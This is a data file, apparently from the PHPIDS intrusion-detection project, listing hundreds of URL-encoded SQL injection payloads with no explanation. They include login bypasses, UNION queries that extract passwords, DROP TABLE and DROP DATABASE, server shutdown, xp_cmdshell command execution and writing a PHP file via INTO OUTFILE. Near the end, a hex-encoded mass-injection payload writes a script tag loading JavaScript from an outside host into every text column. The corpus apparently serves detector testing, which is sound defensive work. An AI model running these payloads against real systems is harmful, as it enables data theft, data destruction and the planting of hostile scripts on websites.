#
# Various samples from PHPIDS
#
%22+OR+1%3D1%23
%3B+DROP+table+Users+--
admin%27--
SELECT+%2F%2A%2132302+1%2F0%2C+%2A%2F+1+FROM+tablename
10%3BDROP+members+--
SELECT+CHAR%280x66%29
SELECT+LOAD_FILE%280x633A5C626F6F742E696E69%29
EXEC%28%40stored_proc+%40param%29
chr%2811%29%7C%7Cchr%2812%29%7C%7Cchar%2813%29
1+or+name+like+%27%25%27
1+OR+%271%27%21%3D0
1+OR+ASCII%282%29+%3D+ASCII%282%29
1%27+OR+1%26%221
1%27+OR+%271%27+XOR+%270
1+OR%2B1%3D1
1+OR%2B%281%29%3D%281%29
aaa%27+or+%281%29%3D%281%29+%23%21asd
aaa%27+OR+%281%29+IS+NOT+NULL+%23%21asd
a%27+or+1%3D%271
asd%27+union+%28select+username%2Cpassword+from+admins%29+where+id%3D%271
1%27%3B+WAITFOR+TIME+%2717%3A48%3A00+%27+shutdown+--+-a
1%27%3B+anything%3A+goto+anything+--+-a
%27+%3D%2B+%27
asd%27+%3D-+%28-%27asd%27%29+--+-a
aa%22in%2B+%28%22aa%22%29+or+-1+%21%3D+%220
aa%22+%3D%2B+-+%220++
aa%27+LIKE+0+--+-a
aa%27+LIKE+md5%281%29+or+%271
aa%27+REGEXP-+md5%281%29+or+%271
aa%27+DIV%401+%3D+0+or+%271
aa%27+XOR-+column+%21%3D+-%270
union+select+password+from+users+where+1
str%27%3Dversion%28%29%0A%09%09%09%09%09%09UNION%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09SELECT+group_concat%28table_name%29%23%0A%09%09%09%09%09%09%23%23%0A%09%09%09%09%09%09%2F%2A%21FROM%2A%2F+information_schema.tables+WHERE+%271
asd%22or-1%3D%22-1
asd%22or%211%3D%22%211
asd%22or%21%281%29%3D%221
asd%22or%401%3D%22%401
asd%22or-1+XOR%220
asd%22+or+ascii%281%29%3D%2249
asd%22+or+md5%281%29%5E%221
asd%22+or+table.column%5E%221
asd%22+or+%40%40version%5E%220
asd%22+or+%40%40global.hot_cache.key_buffer_size%5E%221
1%22OR%21%22a
1%22OR%21%220
1%22OR-%221
1%22OR%40%221%22+IS+NULL+%231+%21+%28with+unfiltered+comment+by+tx+%3B%29
1%22OR%21%28false%29+%231+%21
1%22OR-%28true%29+%23a+%21
1%22+INTO+OUTFILE+%22C%3A%2Fwebserver%2Fwww%2Freadme.php
asd%27+or+md5%285%29%5E%271+
asd%27+or+column%5E%27-1+
asd%27+or+true+--+a
%5C%22asd%22+or+1%3D%221
a+1%27+or+if%28-1%3D-1%2Ctrue%2Cfalse%29%23%21
aa%5C%5C%22aaa%27+or+%271
%27+or+id%3D+1+having+1+%231+%21
%27+or+id%3D+2-1+having+1+%231+%21
aa%27or+null+is+null+%23%28
aa%27or+current_user%21%3D%27+1
aa%27or+BINARY+1%3D+%271
aa%27or+LOCALTIME%21%3D%270
aa%27like-%27aa
aa%27is%5CN%7C%21%27
%27is%5CN-%21%27
asd%27%7Ccolumn%26%26%271
asd%27%7Ccolumn%21%3D%27
aa%27or+column%3Dcolumn+--+%23aa
aa%27or+column%2Acolumn%21%3D%270
aa%27or+column+like+column+--+%23a
0%27%2Acolumn+is+%5CN+-+%271
1%27%2Acolumn+is+%5CN+or+%271
1%27%2A%40a+is+%5CN+-+%27
1%27%2A%40a+is+%5CN+or+%271
1%27+-1+or%2B1%3D+%27%2B1+
1%27+-1+-+column+or+%271+
1%27+-1+or+%271
+%281%29or%281%29%3D%281%29+
fo%22o%27or%271
%27+OR+UserID+IS+NOT+2
%27+OR+UserID+IS+NOT+NULL
%27+OR+UserID+%3E+1
%27++OR+UserID+RLIKE++%27.%2B%27+
%27OR+UserID+%3C%3E+2
1%27+union+%28select+password+from+users%29+--+-a
1%27+union+%28select%271%27%2C%272%27%2Cpassword+from+users%29+--+-a
1%27+union+all+%28select%271%27%2Cpassword+from+users%29+--+-a
aa%27%21%3D%271
aa%27%21%3D%7E%271
aa%27%3D%28%27aa%27%29%23%28
aa%27%7C%2B%271
aa%27%7C%21%27aa
aa%27%5E%21%27aa+
abc%27+%3D+%21%21%270
abc%27+%3D+%21%21%21%21%270
abc%27+%3D+%21%21%21%21%21%21%21%21%21%21%21%21%21%21%270
abc%27+%3D+%210+%3D+%21%21%270
abc%27+%3D+%210+%21%3D+%21%21%21%270
abc%27+%3D+%21%2B0+%21%3D+%21%270+
aa%27%3D%2B%271
%27%3Bif+1%3D1+drop+database+test--+-a
%27%3Bif+1%3D1+drop+table+users--+-a
%27%3Bif+1%3D1+shutdown--+-a
%27%3B+while+1%3D1+shutdown--+-a
%27%3B+begin+shutdown+end--+-a+
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D+%211+div+1%2B%27
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%211+div+1%2B%27
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%21%40%40version+div+%40%40version%2B%27
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D%2B1+%3D+%21true+div+%40%40version%2B%27
foo%27div+count%28select%60pass%60from%28users%29where+mid%28pass%2C1%2C1%29rlike+lower%28conv%2810%2Cpi%28%29%2Api%28%29%2Cpi%28%29%2Api%28%29%29%29+%29-%270
1-%23canvas%0A++++++++++++++++++++++++%28SELECT+1%2A1+from%28information_schema.tables%29+group+by+table_name+having+-+left%28hex%28table_name%29%2Ctrue%29+%3D+-7%29
str%23%27+UNION+SELECT+group_concat%28table_name%29%0A++++++++++++++++++++++++FROM%60information_schema%60.tables
aa%27in+%280%29%23%28
aa%27%21%3Dascii%281%29%23%28
%27+or+SOUNDEX+%281%29+%21%3D+%270
aa%27RLIKE+BINARY+0%23%28
aa%27or+column%21%3D%271
aa%27or+column+DIV+0+%3D0+%23
aa%27or+column%2B%281%29%3D%271
aa%27or+0%21%3D%270
aa%27LIKE%270
aa%27or+id+%3D%27%5C%27
1%27%3Bdeclare+%40%23+int%3Bshutdown%3Bset+%40%23+%3D+%271
1%27%3Bdeclare+%40%40+int%3Bshutdown%3Bset+%40%40+%3D+%271
asd%27+or+column%26%26%271
asd%27+or+column%3D+%211+and%2B1%3D%271
aa%27%21%3Dascii%281%29+or-1%3D-%271
a%27IS+NOT+NULL+or%2B1%3D%2B%271
aa%27in%28%27aa%27%29+or-1%21%3D%270
aa%27+or+column%3D%2B%211+%231
aa%27+SOUNDS+like%2B%271
aa%27+REGEXP%2B%270
aa%27+like%2B%270
-1%27%3D-%27%2B1
%27%3D%2B%27
aa%27+or+stringcolumn%3D+%2B%211+%231+
aa%27+or+anycolumn+%5E+-%271
aa%27+or+intcolumn+%26%26+%271
asd%27+or+column%26%26%271
asd%27+or+column%3D+%211+and%2B1%3D%271
aa%27+or+column%3D%2B%211+%231
aa%27IS+NOT+NULL+or%2B1%5E%2B%270
aa%27IS+NOT+NULL+or+%2B1-1+xor%270
aa%27IS+NOT+NULL+or%2B2-1-1-1+%21%3D%270
aa%27%7C1%2B1%3D%282%29Or%281%29%3D%271
aa%27%7C3%21%3D%274
aa%27%7Cascii%281%29%2B1%21%3D%271
aa%27%7CLOCALTIME%2A0%21%3D%271+
asd%27+%7C1+%21%3D+%281%29%23aa
%27+is+99999+%3D+%27
%27+is+0.00000000000+%3D+%27
1%27%2Acolumn-0-%270
1%27-%40a+or%271
a%27-%40a%3D%40a+or%271
aa%27+%2A%40var+or+1+SOUNDS+LIKE+%281%29%7C%271
aa%27+%2A%40var+or+1+RLIKE+%281%29%7C%271+
a%27+or%7Ecolumn+like+%7E1%7C%271
%27%3C%7E%27
a%27-1.and+%271
aa%27%2F1+DIV+1+or%2B1%3D%2B%271+
aa%27%260%2B1%3D%27aa
aa%27+like%280%29+%2B+1--+-a+
aa%27%5E0%2B0%3D%270
aa%27%5E0%2B0%2B1-1%3D%280%29--+-a
aa%27%3C3%2B1+or%2B1%3D%2B%271
aa%27%251%2B0%3D%270
%27%2F1%2F1%3D%27
+aa%27%2F1+or+%271
+aa1%27+%2A+%40a+or+%271+%27%2F1+regexp+%270
+%27+%2F+1+%2F+1+%3D%27
+%27%2F1%3D%27
+aa%27%260%2B1+%3D+%27aa
+aa%27%26%2B1%3D%27aa
+aa%27%26%281%29%3D%27aa
+aa%27%5E0%2B0+%3D+%270
+aa%27%5E0%2B0%2B1-1+%3D+%280%29--+-a
+aa%27%5E%2B-3+or%271
+aa%27%5E0%21%3D%271
+aa%27%5E%280%29%3D%270
+aa%27+%3C+%283%29+or+%271
+aa%27+%3C%3C3+or%271
+aa%27-%2B%211+or+%271
+aa%27-%211+like%270
+aa%27+%25+1+or+%271
+aa%27+%2F+%271%27+%3C+%273
+aa%27+%2F+%2B1+%3C+%273
+aa%27+-+%2B+%21+2+%21%3D+%2B+-+%271
+aa%27+-+%2B+%21+1+or+%271
+aa%27+%2F+%2B1+like+%270
+%27+%2F+%2B+%281%29+%2F+%2B+%281%29+%3D%27
+aa%27+%26+%2B%280%29-%281%29%3D%27aa
+aa%27+%5E%2B+-%280%29+%2B+-%280%29+%3D+%270
+aa%27+%5E+%2B+-+3+or+%271
+aa%27+%5E+%2B0%21%3D%271
+aa%27+%3C+%2B3+or+%271
+aa%27+%25+%2B1+or+%271
aa%27or+column%2A0+like%270
aa%27or+column%2A0%3D%270
aa%27or+current_date%2A0
1%27%2Fcolumn+is+not+null+-+%27+
1%27%2Acolumn+is+not+%5CN+-+%27+
1%27%5Ecolumn+is+not+null+-+%27+
aa%27+is+0+or+%271
%27+or+MATCH+username+AGAINST+%28%27%2Badmin+-a%27+IN+BOOLEAN+MODE%29%3B+--+-a
%27+or+MATCH+username+AGAINST+%28%27a%2A+-%29+-%2B+%27+IN+BOOLEAN+MODE%29%3B+--+-a
1%27%2A%40a+or+%271
1%27%2Anull+or+%271
1%27%2AUTC_TIME+or+%271
1%27%2Anull+is+null+-+%27
1%27%2A%40a+is+null+-+%27
1%27%2A%40%40version%2A-0%2520%3D%2520%270
1%27%2Acurrent_date+rlike%270
aa%27%2Fcurrent_date+in+%280%29+--+-a
aa%27+%2F+current_date+regexp+%270
aa%27+%2F+current_date+%21%3D+%271
1%27+or+current_date%2A-0+rlike%271
0%27+%2F+current_date+XOR+%271
%27or+not+false+%23aa
1%27+%2A+id+-+%270
1%27+%2Aid-%270
asd%27%3B+shutdown%3B+
asd%27%3B+select+null%2Cpassword%2Cnull+from+users%3B+
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b+where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user+OPEN+tablecursor+
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b%0A++++++++++++++++++++++++where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user%0A++++++++++++++++++++++++OPEN+tablecursor+FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+WHILE%28%40a+%21%3D+null%29%0A++++++++++++++++++++++++%40query++%3D+null%2Bnull%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2Bnull%2B+%27+SET+id%3Dnull%2C%40b+%3D+%40payload%27%0A++++++++++++++++++++++++BEGIN+EXEC+sp_executesql+%40query%0A++++++++++++++++++++++++FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+END%0A++++++++++++++++++++++++CLOSE+tablecursor+DEALLOCATE+tablecursor%3B%0A++++++++++++++++++++++++and+some+text%2C+to+get+pass+the+centrifuge%3B+and+some+more+text.
%40query++%3D+null%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2B+%27+SET%5B++%27%2Bnull%2B%40b%2B+%27+%5D++%3D+%40payload%27
asd%27+union+distinct%28select+null%2Cpassword%2Cnull+from+users%29--a+
asd%27+union+distinct+%28+select+null%2Cpassword%2C%28null%29from+user+%29--+a+
# double encoded
## DECLARE%2520%40S%2520CHAR%284000%29%3BSET%2520%40S%3DCAST%280x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%2520AS%2520CHAR%284000%29%29%3BEXEC%28%40S%29%3B
DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
## asaa%27%3BSELECT%5Basd%5DFROM%5Basd%5D
## asd%27%3B+select+%5Bcolumn%5D+from+users+
0x31+union+select+%40%40version%2Cusername%2Cpassword+from+users+
1+order+by+if%281%3C2+%2Cuname%2Cuid%29+
1+order+by+ifnull%28null%2Cuserid%29+
2%27+between+1+and+3+or+0x61+like+%27a
4%27+MOD+2+like+%270
-1%27+%2FID+having+1%3C+1+and+1+like+1%2F%271+
2%27+%2F+0x62+or+0+like+binary+%270
0%27+between+2-1+and+4-1+or+1+sounds+like+binary+%271+
-1%27+union+%28%28select+%28select+user%29%2C%28select+password%29%2C1%2F1+from+mysql.user%29%29+order+by+%271+
-1%27+or+substring%28null%2Fnull%2C1%2Fnull%2C1%29+or+%271
1%27+and+1+%3D+hex%28null-1+or+1%29+or+1+%2F%27null+
AND+CONNECTION_ID%28%29%3DCONNECTION_ID%28%29
AND+ISNULL%281%2F0%29
MID%28%40%40hostname%2C+1%2C+1%29
CHARSET%28CURRENT_USER%28%29%29
DATABASE%28%29+LIKE+SCHEMA%28%29
COERCIBILITY%28USER%28%29%29
1%27+and+0x1abc+like+0x88+or+%270
%27-1-0+union+select+%28select+%60table_name%60+from+%60information_schema%60.tables+limit+1%29+and+%271
null%27%27null%27+find_in_set%28uname%2C+%27lightos%27+%29+and+%271
%28case-1+when+mid%28load_file%280x61616161%29%2C12%2C+1%2F+1%29like+0x61+then+1+else+0+end%29+
%27sounds+like%281%29+union%19%28select%191%2Cgroup_concat%28table_name%29%2C3%19from%19information_schema.%60tables%60%29%23%28
0%27+%271%27+like+%280%29+and+1+sounds+like+a+or+true%231
+0%27rlike%280%29and+1+rlike+%28%40a%29or+true+-+%27+0+
2a%27-1%5E+%27+0%27+and+%28select+mid%28user%2C1+%2F1%2C1%2F+1%29from%60mysql%60.user+limit+1%29+rlike+%27r
+A%27+sounds+like%28select+case%281%3D1%29when%271%27then%27A%27end%29+and+%271
1%27+and+0x31%3D%271+
1%27+and+0x05%3D%28select+0-+-mid%28version%28%29%2F-+-1%2C+1%2C1%29+as+%27a%27+from+dual%29+and+%271+
%27AND+1.-1LIKE.1+EXEC+xp_cmdshell+%27dir+

# skipping
#SELECT+1%2C2%2C0xEF%60
#SELECT+1%2C2%2C3%60abc%60%60

1%27AND%23%0A++++++++++++++++++++++++0%23%0A++++++++++++++++++++++++UNION%23%0A++++++++++++++++++++++++SELECT%40a%3A%3Dtable_name+FROM%23%0A++++++++++++++++++++++++information_schema.tables+LIMIT+1%23
1%27+and+0x43+%3D+%28select+all+mid%28table_name%2C+1%2C1%29as%27a%27from+%60information_schema%60.tables+limit+1%29+and+%271%0A++++++++++++++++++++++++%27AND+1.-1LIKE.1+INSERT+INTO+TMP_DB+EXEC+%22xp_cmdshell%22%27dir
1%27+AND+0x35+%3D+%28SELECT+%40phpids%3A%3DMID%28%40%40version+FROM+1+FOR+1%29+FROM+dual%29+and+%271+
null%27+or+%40%3A%3D%28select+all+user%27%27+from+mysql+.+user+limit+1%29+union%23%0A++++++++++++++++++++++++%23%0A++++++++++++++++++++++++select+%40%27
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+version%28%29%60
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+%28select+%60user%60+from%23%0A++++++++++++++++++++++++%23cc%0A++++++++++++++++++++++++mysql.user+limit+1%29%27